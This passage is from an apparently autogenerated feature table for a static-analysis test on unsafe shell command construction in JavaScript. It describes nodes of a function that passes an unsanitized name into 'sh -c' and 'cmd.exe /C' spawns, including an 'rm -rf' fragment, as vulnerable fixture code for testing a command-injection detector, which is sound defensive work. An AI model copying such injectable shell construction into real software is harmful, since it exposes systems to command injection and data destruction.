name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args = ["-c", cmd] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args = ["-c", cmd] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args = ["-c", cmd] | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args = ["-c", cmd] | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:6:158:23 | args = ["-c", cmd] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:13:158:23 | ["-c", cmd] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:13:158:23 | ["-c", cmd] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:13:158:23 | ["-c", cmd] | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:13:158:23 | ["-c", cmd] | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:13:158:23 | ["-c", cmd] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:14:158:17 | "-c" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:158:20:158:22 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:3 | cp | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:3 | cp | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:9 | cp.spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:9 | cp.spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:9 | cp.spawn | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:9 | cp.spawn | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:9 | cp.spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | cp.spaw ... gs, cb) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | cp.spaw ... gs, cb) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | cp.spaw ... gs, cb) | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | cp.spaw ... gs, cb) | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | cp.spaw ... gs, cb) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | exceptional return of cp.spaw ... gs, cb) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | exceptional return of cp.spaw ... gs, cb) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | exceptional return of cp.spaw ... gs, cb) | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | exceptional return of cp.spaw ... gs, cb) | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | exceptional return of cp.spaw ... gs, cb) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:5:159:9 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:5:159:9 | spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:5:159:9 | spawn | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:5:159:9 | spawn | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:5:159:9 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:11:159:12 | sh | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:15:159:18 | args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | 